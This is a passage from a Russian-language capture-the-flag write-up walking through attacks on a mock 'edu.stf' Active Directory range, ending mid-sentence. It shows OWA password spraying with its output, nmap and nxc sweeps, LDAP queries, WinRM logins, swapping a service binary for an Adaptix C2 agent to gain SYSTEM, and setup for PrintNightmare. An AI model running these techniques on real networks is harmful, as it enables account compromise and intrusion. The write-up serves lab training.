\u041d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0435 e-mail \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 spray.txt \u043f\u0440\u043e\u0433\u043e\u043d\u044f\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u043d\u0441\u043e\u043b\u044c\u043d\u0443\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u0443.atomizer owa mail.edu.stf spray.txt users_standoff.txt -i 0:00:01[*] Trying to find autodiscover URL[+] Using OWA autodiscover URL: https:\/\/exchange.edu.stf\/autodiscover\/autodiscover.xml[+] OWA domain appears to be hosted internally[+] Got internal domain name using OWA: edu[*] Starting spray at 2026-05-21 20:53:27 UTC[-] Authentication failed: t_mathis@edu.stf:password (Invalid credentials)[-] Authentication failed: r_andrews@edu.stf:password (Invalid credentials)[-] Authentication failed: s_dotson@edu.stf:password (Invalid credentials)[*] Starting spray at 2026-05-21 20:58:27 UTC[-] Authentication failed: r_andrews@edu.stf:anna (Invalid credentials)[-] Authentication failed: t_mathis@edu.stf:anna (Invalid credentials)[-] Authentication failed: s_dotson@edu.stf:anna (Invalid credentials)[*] Starting spray at 2026-05-21 21:03:28 UTC[-] Authentication failed: t_mathis@edu.stf:dancer (Invalid credentials)[-] Authentication failed: s_dotson@edu.stf:dancer (Invalid credentials)…[+] Dumped 2 valid accounts to owa_valid_accounts.txt\u041d\u0430\u0445\u043e\u0434\u0438\u043c 2 \u0432\u0430\u043b\u0434\u0438\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u043c.\u041c\u043e\u0436\u043d\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c e-mail \u0441 \u043b\u044e\u0431\u043e\u0439 \u0438\u0437 \u043d\u0438\u0445 \u0438 \u043e\u0442\u0432\u0435\u0442\u043d\u044b\u043c \u043f\u0438\u0441\u044c\u043c\u043e\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0444\u043b\u0430\u0433.[infra-3] \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a VPN \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438\u042d\u0442\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0441\u0432\u044f\u0437\u0430\u043d\u043e \u0441 \u043e\u0434\u043d\u0438\u043c \u0438\u0437 \u0437\u0430\u0434\u0430\u043d\u0438\u0435\u043c web. \u042f \u0440\u0430\u043d\u0435\u0435 \u0443\u0436\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043b \u044d\u0442\u043e\u0442 config \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0444\u0430\u0437\u0437\u0438\u043d\u0433\u0430 \u0441\u043a\u0440\u044b\u0442\u044b\u0445 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0439.\u041a\u043e\u043f\u0438\u0440\u0443\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435, \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c \u0432 .ovpn \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u0441 \u043a\u0440\u0435\u0434\u0430\u043c\u0438 \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u043c\u0438 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0438.[infra-4] \u0412\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u044f\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430 (Active Directory)\u0414\u0430\u043b\u0435\u0435 \u0438\u0437 \u0444\u0430\u0439\u043b\u0430 config \u0443\u0437\u043d\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435route 10.154.16.0 255.255.254.0ifconfig 10.154.17.5 255.255.255.224dhcp-option DNS 10.154.16.134IP-\u0430\u0434\u0440\u0435\u0441 \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0435\u0442\u0438: 10.154.17.5 \u0441 \u043c\u0430\u0441\u043a\u043e\u0439 \/27 (255.255.255.224). \u0422\u043e \u0435\u0441\u0442\u044c \u0442\u0435\u043a\u0443\u0449\u0430\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u0430\u044f \u043f\u043e\u0434\u0441\u0435\u0442\u044c \u2014 \u044d\u0442\u043e \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d \u043e\u0442 10.154.17.0 \u0434\u043e 10.154.17.31.\u041f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 10.124.1.203, \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a DMZ \u0438\u043b\u0438 \u0441\u043e\u0441\u0435\u0434\u043d\u0435\u0439 \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043f\u043e\u0434\u0441\u0435\u0442\u0438 \u043f\u0435\u0440\u0438\u043c\u0435\u0442\u0440\u0430, \u043d\u043e \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b AD \u0431\u0443\u0434\u0443\u0442 \u0438\u043c\u0435\u043d\u043d\u043e \u0432 \u0434\u0438\u0430\u043f\u0430\u0437\u043e\u043d\u0435 10.154.16.0\/23.\u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e\u043d\u044f\u0442\u044c, \u043a\u0430\u043a\u0438\u0435 IP-\u0430\u0434\u0440\u0435\u0441\u0430 \u0432\u043e\u043e\u0431\u0449\u0435 \u043e\u0442\u0432\u0435\u0447\u0430\u044e\u0442 \u043d\u0430 \u0437\u0430\u043f\u0440\u043e\u0441\u044b. \u041f\u0440\u043e\u0439\u0434\u0435\u043c\u0441\u044f \u043f\u043e \u0432\u0441\u0435\u0439 \u0441\u0435\u0442\u0438 10.154.16.0\/23 \u0431\u0435\u0437 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0440\u0442\u043e\u0432 (-sn):nmap -sn -v 10.154.16.0\/23 -oG live_hosts.txtgrep «Up» live_hosts.txt | awk ‘{print $2}’ > targets.txt\u041c\u043e\u0436\u043d\u043e \u043f\u043e\u0439\u0442\u0438 \u0435\u0449\u0435 \u0434\u0430\u043b\u044c\u0448\u0435 \u0438 \u0441\u043e\u0431\u0440\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u0438\u043a \u0434\u043b\u044f etc\/hosts \u0441 \u0443\u0436\u0435 \u0436\u0438\u0432\u044b\u043c\u0438 \u0430\u0439\u043f\u0438\u0448\u043d\u0438\u043a\u0430\u043c\u0438 \u0438 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u043c\u0438 \u0438\u043c\u0435\u043d\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 nmap \u0432\u044b\u0434\u0430\u043b \u0432 \u0432\u044b\u0432\u043e\u0434\u0435.awk ‘\/Status: Up\/ && $3 !~ \/^\\(\\)$\/ { ip = $2; host = $3; gsub(\/[()]\/, «», host); print ip, host }’ infra-hosts1.txt > awk-host.txt\u041f\u043e\u0438\u0441\u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043f\u043e\u0440\u0442\u043e\u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b (\u0414\u043b\u044f Active Directory)nmap -sS -Pn -p 88,135,139,389,445,3268,3389,80,443 -iL targets.txt -oN ad_services.txt\u0422\u0430\u043a\u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u0432\u0441\u0435\u0439 \u0441\u0435\u0442\u0438 \u043d\u0430 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b SMB (Windows-\u043c\u0430\u0448\u0438\u043d\u044b). \u041a\u043e\u043c\u0430\u043d\u0434\u0430 \u0441\u0430\u043c\u0430 \u043f\u043e\u043a\u0430\u0436\u0435\u0442 \u0438\u043c\u0435\u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432, \u0432\u0435\u0440\u0441\u0438\u0438 Windows (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, Windows Server 2019) \u0438 \u0432\u0445\u043e\u0434\u0438\u0442 \u043b\u0438 \u0445\u043e\u0441\u0442 \u0432 \u0434\u043e\u043c\u0435\u043d:nxc smb 10.154.16.0\/23\u041d\u0430\u0445\u043e\u0434\u0438\u043c \u043a\u043e\u043c\u043f \u0420\u043e\u0434\u0440\u0438\u0433\u0435\u0437\u0430 \u041d\u0430\u0445\u043e\u0434\u0438\u043c \u043a\u043e\u043c\u043f \u0440\u043e\u0434\u0440\u0438\u0433\u0435\u0437\u0430 \u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u0435\u0433\u043e \u0442\u0435\u043b\u0435\u0444\u043e\u043d \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ldap ldapsearch -x -H ldap:\/\/10.154.16.134 -D «r_andrews@edu.stf» -w «***» -b «DC=edu,DC=stf» «(sAMAccountName=*rodriquez*)» | grep «phone»[infra-5] \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430 HR-\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430\u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432, \u043d\u0443\u0436\u043d\u044b\u0439 \u043d\u0430\u043c winrm.nxc winrm 10.154.16.0\/23 -u ‘s_dotson’ -p ‘***’\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f, \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433.[infra-6] \u041f\u043e\u043b\u0443\u0447\u0438\u0442\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430 HR-\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430\u0421 \u044d\u0442\u0438\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0435\u043c \u0443 \u043c\u0435\u043d\u044f \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b. \u042f \u0438\u0437\u0443\u0447\u0438\u043b \u0438\u043d\u0444\u0443 \u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0435 \u0438 \u043f\u0440\u043e\u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043b \u043c\u043e\u0439 \u043c\u0430\u043a\u0440\u043e\u0441 \u0443 \u0441\u0435\u0431\u044f \u043d\u0430 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435. Doc \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u043e\u0442\u043b\u0438\u0447\u043d\u043e \u043e\u0442\u0440\u043a\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u044e \u0441\u0435\u0441\u0441\u0438\u044e \u0432 Adaptix C2. \u0417\u0434\u0435\u0441\u044c \u0436\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u043b \u0432 \u0440\u0430\u0437\u043d\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0441 2 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432, \u043d\u043e \u043f\u0438\u0441\u044c\u043c\u0430 \u043f\u0440\u043e\u0441\u0442\u043e \u0438\u0434\u0443\u0442 \u0432 \u043f\u0443\u0441\u0442\u043e\u0442\u0443, \u043d\u0438 \u043e\u0442\u0432\u0435\u0442\u0430, \u043d\u0438 \u043f\u0440\u0438\u0432\u0435\u0442\u0430.\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0443 \u043c\u0435\u043d\u044f \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c \u0440\u0435\u0448\u0438\u0442\u044c \u0442\u0430\u0441\u043a \u043f\u043e \u0437\u0430\u0434\u0443\u043c\u043a\u0435 \u0430\u0432\u0442\u043e\u0440\u0430 \u0438 \u044f \u0440\u0435\u0448\u0438\u043b \u0442\u0430\u0441\u043a \u043f\u043e \u0434\u0440\u0443\u0433\u043e\u043c\u0443.\u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u043f\u043a \u044f \u043d\u0430\u0448\u0435\u043b \u043a\u0440\u0435\u0434\u044b, \u043f\u0440\u0438\u0447\u0435\u043c \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435 \u0434\u0432\u0443\u0445 ws \u0430\u0434\u043c\u0438\u043d\u043e\u0432. \u041f\u0440\u043e\u0441\u0442\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043a\u0440\u0435\u0434\u043e\u0432 \u0434\u0430\u043b\u0430 \u0437\u0430\u0432\u0435\u0442\u043d\u0443\u044e \u043d\u0430\u0434\u043f\u0438\u0441\u044c (Pwn3d!) \u043a \u043d\u0443\u0436\u043d\u043e\u043c\u0443 \u043f\u043a. \u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u0442\u0430\u043a\u0436\u0435 \u043f\u043e winrm \u0438 \u043f\u0440\u043e\u0441\u0442\u043e \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433. \u0410 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u0435 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0430, \u0443\u0436\u0435 \u043d\u0435 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043d\u0438\u043a\u0430\u043a\u043e\u0433\u043e \u0442\u0440\u0443\u0434\u0430.[infra-7] \u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430 HR-\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430\u041e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u0441\u044f \u043d\u0430 \u043f\u043a \u043a \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043a\u0440\u0435\u0434\u044b \u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043f\u043e winrm. Winpeas \u0438 Sharpup \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043c\u043e\u0447\u044c https:\/\/github.com\/ghostpack\/sharpup\u0414\u043b\u044f sharpup \u043d\u0443\u0436\u043d\u043e \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0438. \u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043f\u0430\u043f\u043a\u0443 \u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u0443\u0435\u043c \u043d\u0430 Kali.xbuild SharpUp.csproj \/p:Configuration=Release \/p:Platform=»AnyCPU»\u041e\u0434\u043d\u0430\u043a\u043e \u0435\u0441\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u0443\u0435\u043c \u0442\u0430\u043a, \u043d\u0430 \u0432\u0438\u043d\u0434\u043e\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0432\u044b\u043b\u0435\u0437\u0435\u0442 \u043e\u0448\u0438\u0431\u043a\u0430 \u0432\u0435\u0440\u0441\u0438\u0439, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432 \u0444\u0430\u0439\u043b\u0435 SharpUp.csproj \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0442\u044c \u043d\u043e\u043c\u0435\u0440 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432 \u0441\u0442\u0440\u043e\u043a\u0435 \u043d\u0430 4.5<TargetFrameworkVersion>v3.5<\/TargetFrameworkVersion>\u0422\u043e\u0433\u0434\u0430 \u0432 \u043f\u0430\u043f\u043a\u0435 bin \u0431\u0443\u0434\u0435\u0442 \u0443\u0436\u0435 \u0433\u043e\u0442\u043e\u0432\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f.\u041f\u0435\u0440\u0435\u0434\u0430\u0435\u043c \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043cC:\\Users\\S_Dotson\\Documents\\SharpUp.exe auditpowerup_win_privs\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u043b\u043d\u044b\u0435 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430\u0434 \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u044b\u043c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u043c \u0444\u0430\u0439\u043b\u043e\u043c, \u0442\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0442\u0435\u0445\u043d\u0438\u043a\u043e\u0439 \u043f\u043e\u0434\u043c\u0435\u043d\u044b \u0444\u0430\u0439\u043b\u043e\u0432 \u0438 \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c \u0430\u0433\u0435\u043d\u0442\u0430 \u0438 \u043f\u043e\u043b\u043e\u0436\u0438\u043c \u043d\u0430 \u043c\u0435\u0441\u0442\u043e \u044d\u0442\u043e\u0433\u043e \u0441\u0435\u0440\u0441\u0438\u0441\u0430.\u042f \u0434\u0435\u043b\u0430\u043b \u044d\u0442\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Adaptix C2, \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043d\u0443\u0436\u043d\u043e \u201cService Exe\u201d. \u0417\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c \u0441\u0442\u0430\u0440\u044b\u0439 \u0444\u0430\u0439\u043b \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u043c, \u0430 \u043d\u043e\u0432\u044b\u0439 \u0444\u0430\u0439\u043b \u043a\u043b\u0430\u0434\u0435\u043c \u043d\u0430 \u043c\u0435\u0441\u0442\u043e \u0441\u0442\u0430\u0440\u043e\u0433\u043e. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0441\u043b\u0443\u0436\u0431\u0430 \u0441\u0435\u0439\u0447\u0430\u0441 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430, \u043d\u0443\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u0443.\u0414\u0430\u043b\u0435\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u0435\u0441\u0441\u0438\u044e, \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u0442\u043e\u0433\u043e\u0436\u0435 s_dotson, \u043d\u043e \u0443\u0436\u0435 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 High Label \u0438 \u0441 \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e\u043c \u043f\u0440\u0430\u0432.Adaptix_C2\u042f \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u043f\u043e\u0432\u044b\u0441\u0438\u043b\u0441\u044f \u0434\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438 \u0437\u0430\u043a\u0440\u0435\u043f\u0438\u043b\u0441\u044f \u043c\u0438\u0433\u0440\u0430\u043d\u0443\u0432 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441, \u0447\u0442\u043e\u0431\u044b \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0434\u043e\u0441\u0442\u0443\u043f \u043d\u0435 \u043f\u043e\u0442\u0435\u0440\u044f\u043b\u0441\u044f.\u041c\u0438\u0433\u0440\u0430\u0446\u0438\u044f_\u043d\u0430_\u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439_\u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0427\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433 \u0432 \u043a\u043e\u0440\u043d\u0435 \u0434\u0438\u0441\u043a\u0430 C.\u0422\u0430\u043a\u0436\u0435 \u043d\u0435 \u0441\u0442\u043e\u0438\u0442 \u0437\u0430\u0431\u044b\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0442\u044c \u043f\u043a \u0447\u0435\u0440\u0435\u0437 \u0443\u0442\u0438\u043b\u0438\u0442\u0443 winpeas.[infra-8] \u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430 HR-\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0442\u0435\u043f\u0435\u0440\u044c \u0443 \u043c\u0435\u043d\u044f \u0435\u0441\u0442\u044c \u043a\u0440\u0435\u0434\u044b \u043e\u0442 ws \u0430\u0434\u043c\u0438\u043d\u043e\u0432, \u043f\u0440\u0438\u0447\u0435\u043c \u0434\u0432\u0443\u0445, \u044f \u043f\u043b\u0435\u0432\u0430\u0442\u044c \u0445\u043e\u0442\u0435\u043b \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0437\u0430\u0434\u0443\u043c\u044b\u0432\u0430\u043b\u043e\u0441\u044c. \u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u0438 \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433.\u041f\u0440\u043e\u0441\u0442\u043e_\u0447\u0438\u0442\u0430\u0435\u043c_\u0444\u043b\u0430\u0433[infra-9] \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438\u042d\u0442\u043e\u0442 \u0442\u0430\u0441\u043a \u0442\u043e\u0436\u0435 \u043c\u043e\u0433 \u0431\u044b \u0431\u044b\u0442\u044c \u043e\u0447\u0435\u043d\u044c \u043a\u0440\u0443\u0442\u044b\u043c, \u0435\u0441\u043b\u0438 \u0431\u044b \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b. \u0417\u0434\u0435\u0441\u044c \u0440\u0435\u0447\u044c \u0438\u0434\u0435\u0442 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 PrintNightmare, \u043e\u0434\u043d\u0430 \u0438\u0437 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 CVE — https:\/\/github.com\/cube0x0\/cve-2021-1675 . PrintNightmare \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 \u0442\u043e\u043c, \u0447\u0442\u043e \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u0435\u0447\u0430\u0442\u0438 Windows (Print Spooler) \u0434\u043e\u0432\u0435\u0440\u044f\u043b\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 \u043f\u0440\u0438\u043d\u0442\u0435\u0440\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u043b\u0430 \u0435\u0433\u043e \u0441 \u043e\u0447\u0435\u043d\u044c \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 (SYSTEM)\u042f \u0435\u0435 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437\u0443\u0447\u0438\u043b \u0438 \u044d\u0442\u043e \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u0435\u0442\u0441\u044f \u043d\u0435 \u0442\u0430\u043a \u0447\u0430\u0441\u0442\u043e. \u041f\u043e \u0448\u0430\u0433\u0430\u043c, \u0447\u0442\u043e \u043e\u043d\u0430 \u0434\u0435\u043b\u0430\u0435\u0442.\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u043a \u0441\u043b\u0443\u0436\u0431\u0435 \u043f\u0435\u0447\u0430\u0442\u0438 \u043f\u043e RPC. \u0412\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e AddPrinterDriverEx. \u0423\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043f\u0443\u0442\u044c \u043a DLL (\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c \u0447\u0435\u0440\u0435\u0437 msfvenom) \u0447\u0435\u0440\u0435\u0437 SMB-\u0448\u0430\u0440\u0443. \u0417\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 Print Spooler \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u044d\u0442\u0443 DLL \u043a\u0430\u043a \u0434\u0440\u0430\u0439\u0432\u0435\u0440. DLL \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 SYSTEM.\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 PrintNightmare \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0438\u043c\u0435\u0442\u044c \u0430\u0431\u0441\u043e\u043b\u044e\u0442\u043d\u043e \u043b\u044e\u0431\u044b\u0435 \u0432\u0430\u043b\u0438\u0434\u043d\u044b\u0435 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0435 